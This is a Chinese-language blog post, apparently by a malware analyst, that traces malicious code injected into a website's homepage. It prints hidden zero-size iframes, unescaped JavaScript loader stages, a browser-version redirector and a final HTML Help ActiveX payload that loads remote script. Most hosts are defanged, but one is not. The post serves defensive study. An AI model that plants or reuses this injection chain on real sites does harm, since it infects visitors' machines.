endurer 原创
网站首页被插入恶意代码:
<iframe src='hxXP://www.***hyap98.com/123/wawa.htm' width='0' height='0' frameborder='0'></iframe><iframe src='hxxp://djloveQQ.***go3.icpcn.com/cert/joke.htm' width='0' height='0' frameborder='0'></iframe>
hxxp://www.***hyap98.com/123/wawa.htm的部分内容经过escape()加密,upescape()后为:
<Html>
<HEAD>
<SCRipT LANGUAGE="javascript">
<!--
var Words="<iframe src="hxxp://www.***hyap98.com/123/music.htm" width='0' height='0' frameborder='0'></iframe>
<iframe src="hxxp://www.***hyap98.com/rx/joke.htm" width='0' height='0' frameborder='0'></iframe>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/123/music.htm的部分内容经过escape()加密,upescape()后为:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<embed type="audio/x-pn-realaudio-plugin"
src="music.smi"
controls="controlpanel,statusbar" height=95
width=150 autostart=true>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/rx/joke.htm的内容为(已去掉开头的多个空格):
<center><font color=red>对不起,您访问的页面不存在!</font><center> <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>
此网页检查IE版本,并打开相应的网页windows.htm、wint.htm或w98.htm。
hxxp://www.***hyap98.com/rx/windows.htm的部分内容经过escape()加密,upescape()并去掉多余的起始空格后为:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<SCRIPT language=VScript src="http://www.qqread.com/java/young.gif"></SCRIPT><SCRIPT language=VScript src="young.CSS"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news526" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/windows/help/apps.chm');</OBJECT><OBJECT id="news215" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.***hyap98.com/rx/young.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>news526.Click();f1=1+1;f1=f1+2;setTimeout("news215.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>"
